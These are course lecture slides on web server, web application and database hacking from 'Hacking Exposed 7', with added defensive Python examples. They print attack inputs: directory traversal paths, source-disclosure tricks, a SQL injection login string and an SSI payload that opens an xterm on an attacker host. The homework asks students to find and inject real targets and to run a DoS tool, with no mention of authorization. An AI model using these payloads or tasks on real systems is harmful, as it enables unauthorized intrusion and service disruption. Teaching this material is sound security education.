Hacking Exposed 7 Network Security Secrets & Solutions


1 Hacking Exposed 7: Network Security Secrets & Solutions
Chapter 10: Web and Database Hacking

2 Outline
- Web Server Hacking
  - Sample Files and Source Code Disclosure
  - Canonicalization Attacks and Server Extensions
  - Buffer Overflows and Denial of Service
  - Vulnerability Scanners
- Web Application Hacking
  - Googledorks and Web Crawling
  - Assessment and Analysis
  - Web Application Security Scanners
  - Common Web Application Vulnerabilities
- Database Hacking
  - Database Discovery
  - Database Vulnerabilities
  - Other Considerations
- Summary

3 HBGary Federal Attacked by "Anonymous" in 2011
- Victim: security startup HBGary Federal
- Hackers: "Anonymous"
- SQL injection vulnerability in their CMS (content management system): foreign parameters were passed from the CMS to the SQL database
- Revealed usernames, addresses and password hashes
- MD5 password hashes were cracked offline with rainbow tables
- The same passwords were used for Twitter, LinkedIn, Facebook and e-mail accounts
- A glibc privilege escalation attack was used to gain root on the systems
- Anonymous published gigabytes of e-mails of HBGary Federal employees

4 Web Server Hacking: Sample Files and Source Code Disclosure
Sample files
- Example: Microsoft's IIS 4.0 installed sample code by default, including showcode.asp and codebrws.asp
- These files let an attacker view almost any file on the server, for example:
  /../../../boot.ini
  /../../../../../winnt/repair/setup.log
- Solution: remove sample files from production web servers
Source code disclosure
- Example: the IIS +.htr vulnerability; IIS 4 and 5 could reveal portions of source code through the HTR ISAPI extension
- Attack URLs:
- Never store sensitive data in your application source code

5 Web Server Hacking: Canonicalization Attacks and Server Extensions
Canonicalization attacks
- The process of resolving a resource to a standard name is called canonicalization
- Example: the ASP ::$DATA vulnerability in Microsoft's IIS, affecting IIS 4 and earlier versions
- Simply appending ::$DATA to the end of an ASP page's URL revealed the page's source code
- Solution: compartmentalize your application directory structure
Server extensions
- Example: the Microsoft WebDAV "Translate: f" problem
- Adding a "Translate: f" header to the HTTP GET request and a \ to the end of the URL could reveal source code
- Solution: patch or disable the vulnerable extension
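A request-path canonicalizer that rejects the tricks on slides 4 and 5 (the ../ traversal used against the sample files, the ::$DATA stream suffix, and the trailing backslash of the Translate: f trick), written here as an added Python example; it is not code from the book or from IIS, and WEB_ROOT and the function names are assumptions for the illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for this example (not from the book).
WEB_ROOT = "/var/www/html"


def fully_decode(path, rounds=3):
    """Percent-decode until the string stops changing, so a double-encoded
    segment such as %252e%252e is seen as '..' rather than passed through."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded
    return path


def canonicalize(url_path):
    """Map a request path to one canonical file path under WEB_ROOT.

    Returns None when the path carries any of the tricks the slides describe,
    so the caller serves nothing instead of guessing what was meant."""
    decoded = fully_decode(url_path)
    # NUL bytes and backslashes: Windows treats '\' as a path separator, which is
    # what the "Translate: f" + trailing '\' trick relies on.
    if "\x00" in decoded or "\\" in decoded:
        return None
    # NTFS alternate data stream suffix, e.g. default.asp::$DATA.
    if "::" in decoded:
        return None
    # Parent-directory segments are rejected outright rather than collapsed,
    # so /../../../boot.ini never resolves to anything.
    if ".." in decoded.split("/"):
        return None
    # Collapse '.' segments and duplicate slashes into one standard name.
    canonical = posixpath.normpath("/" + decoded.lstrip("/"))
    return WEB_ROOT + canonical
```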

6 Web Server Hacking: Buffer Overflows and Denial of Service
Buffer overflows
- Example: IIS HTR chunked-encoding transfer heap overflow, affecting Microsoft IIS 4.0, 5.0 and 5.1
- Triggered by an HTTP request containing 'Transfer-Encoding: chunked' whose file name ends with ".htr"
- Leads to remote denial of service or remote code execution at the privilege level
- Solution: apply a software patch, preferably from a reliable source
Denial of service
- Example: The Jester's tool XerXes, which appears to perform layer 7 attacks
- Countermeasure: limit the number of POST parameters to 10,000

7 Web Server Hacking: Vulnerability Scanners
Nikto: comprehensive tests against web servers for web server vulnerabilities
PROS
- Updates with a simple command
- CSV output format
- Supports SSL
- Captures cookies from the web server
- Accepts nmap output as input
- Supports multiple IDS evasion techniques
CONS
- Does not take an IP range as input
- Does not support digest or NTLM authentication
- Cannot perform checks with cookies

8 Web Server Hacking: Vulnerability Scanners
Nessus: network vulnerability scanner for known server vulnerabilities
PROS
- Has a GUI
- Client/server architecture with automated tests
- Targets can be scanned automatically
- Provides proxy support with authentication
CONS
- Not directly focused on web servers
- Real-time updates to the scan database require a subscription
- Limited HTTP authentication support

9 Web Application Hacking: Googledorks and Web Crawling
Finding vulnerable web apps with Google (Googledorks)
- Example: "Index of /password"
- site:
Web crawling collects
- Static and dynamic pages
- Include and other support files
- Source code
- Server response headers
- Cookies
Web-crawling tools
- Wget
- HTTrack

10 Web Application Hacking: Assessment and Analysis
Web application assessment covers
- Authentication
- Session management
- Database interaction
- Generic input validation
- Application logic
Tool example: WebScarab
- Allows the user to intercept and alter HTTP traffic
- Includes spidering and fuzzing
- Runs on any platform
Analysis
- Browser plug-ins: modify the data and send it to the remote server
- Free tool suites: built around web proxies placed between the web client and the web server

11 Web Application Hacking: Web Application Security Scanners
- Server analyzer (tool example: Nmap): a tool to fingerprint and identify the software running a web server
- Web brute (tool example: Nessus): checks authentication interfaces for weak credentials
- Web discovery: port scanner
- Web proxy (tool example: Burp Suite): local man-in-the-middle analysis tool for disassembling web communications
- Burp Suite: Proxy, Repeater, Sequencer, Spider; a powerful tool to craft automated attacks

12 Common Web Application Vulnerabilities
Cross-Site Scripting (XSS)
- Targeted at other users of the vulnerable application: post-to-propagate
- Example:
- Countermeasures: filter input parameters for special characters
SQL Injection
- A request for dynamic content becomes a SQL query built from the request parameters
- Example: Username: ' or 1=1--
- Countermeasures: (1) use bind variables; (2) lock down the database server configuration; (3) implement default error handling
Cross-Site Request Forgery (CSRF)
- Example: send a fake POST request to a server
- Countermeasures: authenticated session
HTTP Response Splitting
- Example: clicking a specially crafted hyperlink on a malicious website
- Countermeasures: solid input validation on server input
Misuse of Hidden Tags
- Example: <input type=hidden name="price" value="100">; an attacker can change the price at will
- Countermeasures: limit the use of hidden tags
Server Side Includes (SSIs)
- Example: <!--#exec cmd="/usr/X11R6/bin/xterm -display attacker:0 &"-->
- Countermeasures: strip out any unauthorized SSI line
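An added Python example (not code from the book) showing why the slide's ' or 1=1-- username defeats a string-built login query but not the bind-variable version, and why a checkout must ignore the hidden price field; the users table, the catalog and the function names are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed sample user table for the demonstration (not from the book)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string formatting: the input is parsed as SQL.
    With username "' or 1=1--" the WHERE clause becomes
    username = '' or 1=1 and the rest is commented out, so any password works."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Bind variables (countermeasure 1 on the slide): the driver passes the
    input as data, so the quote and comment characters have no SQL meaning."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed server-side price list for the hidden-tag example.
CATALOG = {"sku-100": 100}


def order_total_vulnerable(form):
    """Trusts the hidden 'price' field submitted by the browser, as in the
    slide's <input type=hidden name="price"> example."""
    return int(form["price"]) * int(form["qty"])


def order_total_safe(form):
    """Ignores any client-supplied price and looks it up server-side by SKU."""
    return CATALOG[form["sku"]] * int(form["qty"])
```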

13 Database Hacking: Database Discovery
- Tool example: Nmap
- Countermeasures: never expose your databases directly to the Internet; run intrusion detection tools to identify network port scanning attempts

14 Database Hacking: Database Vulnerabilities
- Network attacks. Example: CVE , a listener vulnerability that can be exploited without any privileges. Countermeasures: limit the IP addresses allowed to access the database
- Database engine bugs. Example: using buffer overflows to gain full control of the database. Countermeasures: apply DBMS vendor patches
- Weak or default passwords. Countermeasures: alert users to weak and default passwords
- Misconfigurations. Example: leaving listening components without any management passwords. Countermeasures: periodically scan your databases
- Indirect attacks. Example: installing a keylogger on the database administrator's machine. Countermeasures: do not click untrusted or unknown links
- Tool example: Havij, one of the best automatic SQL injection tools

15 Database Hacking: Other Considerations, Infecting More Machines
- Attackers infect database tables with malicious scripts
- The user's browser receives a script from the attacker's site, infecting the user's machine

16 Summary
- Web and database hacking has become an increasingly visible and relevant threat
- Secure systems by keeping up with patches and best-practice configurations
- Validating all user inputs and outputs is essential

17 Homework Ch10
- (30 points) Google Dork: Use a googledork to find a target which can be injected. Explain why this target can be injected. Explain how to avoid it.
- (30 points) Havij: Install Havij. Explain how to use this tool. Use Havij to crack a database.
- (60 points) SQL injection: Try to use SQL injection to crack a web application. Explain why this web application can be cracked.
- (30 points) Burp Suite: Install Burp Suite. Use Burp Suite to scan a target; what kind of information can you get?
- (40 points) Browser plug-in: Introduce a browser plug-in for Chrome or Firefox which can do web application hacking. Explain how to use this tool, and show your results.
- Bonus (40 points): Use XerXes to do a DoS attack.

18 Homework #6 Ch9-Ch10 (150 points) (1/2)
Due: 6/15 (Mon) in class, in printed hardcopy (format: problem, solution with explanation, screen dumps)
1. (60 points) Hacking a game ROM
   1) Learn how to hack a game ROM from this link.
   2) Change "2 PLAYER GAME" in the menu to "2 Your Name GAME", e.g., I change "2 PLAYER GAME" to "2 EKARAT GAME". Capture and paste your change.
   * You can download the target game ROM (Super Mario Adventure (SMB1 Hack).nes) at the course webpage.

19 Homework #6 Ch9-Ch10 (150 points) (2/2)
2. (30 points) Use your hex editor to modify any program you want, and tell us: 1) What is the target program? 2) What is your modification? Show the captured screen of the result.
3. (30 points) Havij: Install Havij. Explain how to use this tool to crack a database.
4. (30 points) Burp Suite: Install Burp Suite. Explain how to use this tool. Use Burp Suite to scan a target; what kind of information can you get?

